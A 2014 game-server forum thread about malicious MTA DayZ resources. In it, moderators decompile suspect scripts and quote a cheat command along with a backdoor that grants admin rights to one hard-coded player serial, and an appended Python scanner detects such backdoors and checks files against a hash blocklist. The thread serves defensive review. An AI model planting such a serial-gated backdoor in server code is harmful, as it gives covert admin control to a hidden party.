MTA Team ccw Posted May 3, 2014

It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation.

If you are an owner of a server running the MTA DayZ gamemode, then you must update your MTA server to the latest build (1.3.5-9.06371).

Linux binaries from here: http://linux.multitheftauto.com/
Windows binaries from here: http://www.mtasa.com/

If you play on a server running the MTA DayZ gamemode, you can check the server version by using the command sver in the client console. If the server build is below 6371, nag the owner to update!

Quited Posted May 3, 2014

What malicious scripts? Do you mean cheats, or a script that uses redirectPlayer to redirect players to other servers? And what is this serial?

    AddBlockedFileReason( "5A5FD6E08D503A125C81BA26594B416A", "Malicious" );

* From the CResourceManager.cpp file.

Woovie Posted May 3, 2014

> What malicious scripts? Do you mean cheats, or a script that uses redirectPlayer to redirect players to other servers? And what is this serial?
>
>     AddBlockedFileReason( "5A5FD6E08D503A125C81BA26594B416A", "Malicious" );
>
> * From the CResourceManager.cpp file.

That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious".

The script had functions that did a range of things, from giving items to player teleporting, but the only visible function was one that gave you a list of cars. It was a popular script for MTA DayZ servers so that admins could keep track of stuff.

Lawliet Posted May 3, 2014

> It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation.

What exactly does "script" mean in this regard? Is it a resource you can enable/disable at any time or is it a third party program which exclusively targets MTA DayZ? Also, what exactly is said script trying to accomplish? Do I have to worry about compromised passwords, usernames, resources etc? Is this announcement an extension to this post by Woovie?

EDIT: I see that Woovie has already answered my questions. We never used that particular resource, so we don't have to worry about anything... but rest assured, we will still update to the latest version once it's available for us.

Quited Posted May 3, 2014 (edited)

> That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious

OK, I have most serials doing something bad in MTA. And this serial? 5A5FD6E08D503A125C81BA26594B416A Is it in the blacklist?

Edited May 3, 2014 by Guest

Woovie Posted May 3, 2014

Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code.

MTA Team Dutchman101 Posted May 3, 2014

> Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code.

It's not someone's serial. It's a hash of the malicious files (resource) so that MTA recognizes it.

Quited Posted May 3, 2014

> It's not someone's serial. It's a hash of the malicious files (resource) so that MTA recognizes it.

OK, if somebody can upload malicious resources to the community, he can upload more and more, even if he gets banned.

Woovie Posted May 3, 2014

>> It's not someone's serial. It's a hash of the malicious files (resource) so that MTA recognizes it.
>
> OK, if somebody can upload malicious resources to the community, he can upload more and more, even if he gets banned.

Can you just stop posting?

TheNormalnij Posted May 6, 2014

http://pastebin.com/3uK5ixkG

You can not monitor all malicious resources...

Gallagher Posted May 23, 2014

Hello! I found this MTA DayZ script. It is compiled and has an addCommandHandler in the script. I think it can do harm to the server. Can you check it for me?

https://dl.dropboxusercontent.com/s/6ga ... 1400759763

Jusonex Posted May 23, 2014

Yep, looks like that:

    function giveALLNOOBS()
        setElementData(getLocalPlayer(), "blood", 99999999999999)
        -- The escaped bytes in the next key are the UTF-8 encoding of "Аптечка"
        setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999)
        setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999)
    end
    addCommandHandler("mamka", giveALLNOOBS)

Gallagher Posted May 23, 2014

> Yep, looks like that:
>
>     function giveALLNOOBS()
>         setElementData(getLocalPlayer(), "blood", 99999999999999)
>         setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999)
>         setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999)
>     end
>     addCommandHandler("mamka", giveALLNOOBS)

I need to use this script. Could you delete this scam and send me the file?

Jusonex Posted May 23, 2014

That's the decompiled Lua script:

    -- _FORV_* and _UPVALUE0_ are placeholder names emitted by the decompiler
    function load()
        for _FORV_3_, _FORV_4_ in pairs(_UPVALUE0_) do
            tex = engineLoadTXD("mods/" .. _FORV_4_.fileName .. ".txd", _FORV_4_.model)
            engineImportTXD(tex, _FORV_4_.model)
            mod = engineLoadDFF("mods/" .. _FORV_4_.fileName .. ".dff", _FORV_4_.model)
            engineReplaceModel(mod, _FORV_4_.model)
            txd = engineLoadTXD("mods/1.txd", 2726)
            engineImportTXD(txd, 2726)
            dff = engineLoadDFF("mods/1.dff", 2726)
            engineReplaceModel(dff, 2726)
            txd = engineLoadTXD("mods/2.txd", 2725)
            engineImportTXD(txd, 2725)
            dff = engineLoadDFF("mods/2.dff", 2725)
            engineReplaceModel(dff, 2725)
            txd = engineLoadTXD("mods/3.txd", 2644)
            engineImportTXD(txd, 2644)
            dff = engineLoadDFF("mods/3.dff", 2644)
            engineReplaceModel(dff, 2644)
            txd = engineLoadTXD("mods/4.txd", 2708)
            engineImportTXD(txd, 2708)
            dff = engineLoadDFF("mods/4.dff", 2708)
            engineReplaceModel(dff, 2708)
            txd = engineLoadTXD("mods/5.txd", 2571)
            engineImportTXD(txd, 2571)
            dff = engineLoadDFF("mods/5.dff", 2571)
            engineReplaceModel(dff, 2571)
            txd = engineLoadTXD("mods/6.txd", 2568)
            engineImportTXD(txd, 2568)
            dff = engineLoadDFF("mods/6.dff", 2568)
            engineReplaceModel(dff, 2568)
            txd = engineLoadTXD("mods/7.txd", 2565)
            engineImportTXD(txd, 2565)
            dff = engineLoadDFF("mods/7.dff", 2565)
            engineReplaceModel(dff, 2565)
            txd = engineLoadTXD("mods/8.txd", 2468)
            engineImportTXD(txd, 2468)
            dff = engineLoadDFF("mods/8.dff", 2468)
            engineReplaceModel(dff, 2468)
            txd = engineLoadTXD("mods/9.txd", 2562)
            engineImportTXD(txd, 2562)
            dff = engineLoadDFF("mods/9.dff", 2562)
            engineReplaceModel(dff, 2562)
        end
    end
    addEventHandler("onClientResourceStart", resourceRoot, function()
        setTimer(load, 1000, 1)
    end)

    function giveALLNOOBS()
        setElementData(getLocalPlayer(), "blood", 99999999999999)
        -- The escaped bytes in the next key are the UTF-8 encoding of "Аптечка"
        setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999)
        setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999)
    end
    addCommandHandler("mamka", giveALLNOOBS)

Gallagher Posted May 23, 2014

Thank you, friend.

StreetPunkRulez Posted June 4, 2014

I heard there is another version of this hack with an included bypass of that detection method.

Woovie Posted June 4, 2014

> I heard there is another version of this hack with an included bypass of that detection method.

1. This isn't a hack, it's a resource...
2. They can't bypass our "detection" since it's a script. Any compiled script we can decompile to check for these types of issues.

Gallagher Posted June 20, 2014

Hello! I use this resource on my server for DayZ, but I think it has something malicious. Can you verify?

https://mega.co.nz/#!nlB2gBQZ!u7Qr9JqZb ... bIVRWBw3Yg

Jusonex Posted June 21, 2014

It contains a backdoor:

    function get(player)
        if getPlayerSerial(player) == "DFD1A04C59E7CB85FF672E4CC759F9F4" then
            setElementData(player, "adminn", true)
        else
            cancelEvent()
        end
    end
    addCommandHandler("neves768m", get)

Apart from that it's very insecure (excessive usage of element data etc.), so I wouldn't recommend you to use it on your server.

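An added example, not from any poster in this thread or from the MTA source: a small Python audit that flags command handlers gated on a hard-coded 32-hex serial, the pattern in the backdoor quoted above, next to an exact-hash blocklist check for comparison. The sample script, its command name and serial are constructed, and MD5 is an assumption for the blocklist digest.

```python
import hashlib
import re

# Constructed sample modelled on the handler quoted above; serial and command are placeholders.
SAMPLE = '''
function get(player)
    if getPlayerSerial(player) == "A1B2C3D4A1B2C3D4A1B2C3D4A1B2C3D4" then
        setElementData(player, "adminn", true)
    end
end
addCommandHandler("hiddencmd", get)

function listCars(player)
    outputChatBox("vehicles: " .. #getElementsByType("vehicle"), player)
end
addCommandHandler("cars", listCars)
'''

SERIAL_CMP = re.compile(r'getPlayerSerial\s*\([^)]*\)\s*[=~]=\s*"([0-9A-Fa-f]{32})"')
FUNC_DEF = re.compile(r'^\s*(?:local\s+)?function\s+([\w.:]+)\s*\(', re.M)
CMD_REG = re.compile(r'addCommandHandler\s*\(\s*"([^"]+)"\s*,\s*([\w.:]+)')

def split_functions(src):
    """Map each named function to its text, up to the next named definition."""
    defs = list(FUNC_DEF.finditer(src))
    bodies = {}
    for i, m in enumerate(defs):
        end = defs[i + 1].start() if i + 1 < len(defs) else len(src)
        bodies[m.group(1)] = src[m.start():end]
    return bodies

def find_serial_backdoors(src):
    """Return (command, handler, serial) for command handlers gated on a literal serial."""
    bodies = split_functions(src)
    hits = []
    for cmd, handler in CMD_REG.findall(src):
        # Inline anonymous handlers are not resolved by this simple pass.
        for serial in SERIAL_CMP.findall(bodies.get(handler, "")):
            hits.append((cmd, handler, serial.upper()))
    return hits

def is_blocklisted(src, blocklist):
    """Exact-match check: digest of the file bytes against known-bad digests (MD5 assumed)."""
    return hashlib.md5(src.encode()).hexdigest().upper() in blocklist

if __name__ == "__main__":
    blocklist = {hashlib.md5(SAMPLE.encode()).hexdigest().upper()}
    edited = SAMPLE + "-- one extra comment line\n"
    print("hash match:", is_blocklisted(SAMPLE, blocklist), is_blocklisted(edited, blocklist))
    print("serial-gated commands:", find_serial_backdoors(edited))
```

A source-level scan like this only applies to readable Lua; compiled scripts have to be decompiled first, as the thread describes.
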
lopezloo Posted June 21, 2014

Eh, guys like the author of this script should be globally banned by serial.

Jusonex Posted June 21, 2014

Server: http://pastebin.com/L702uDts
Client: http://pastebin.com/qkJbAw7s

Atton Posted July 20, 2014

Yet another good reason to make encrypted work exclusively on one server.

http://pastebin.com/gBV2FHjW

MrBugsFive Posted February 7, 2015

Hello? You Check Here Files??

http://www.mediafire.com/download/iz2fu ... ves768.rar
Pass: neves768.com

!! Please Check is Secure !! (File Create By Neves768 What Banned/Blocked of Forum by Script Malicious !!) @Jusonex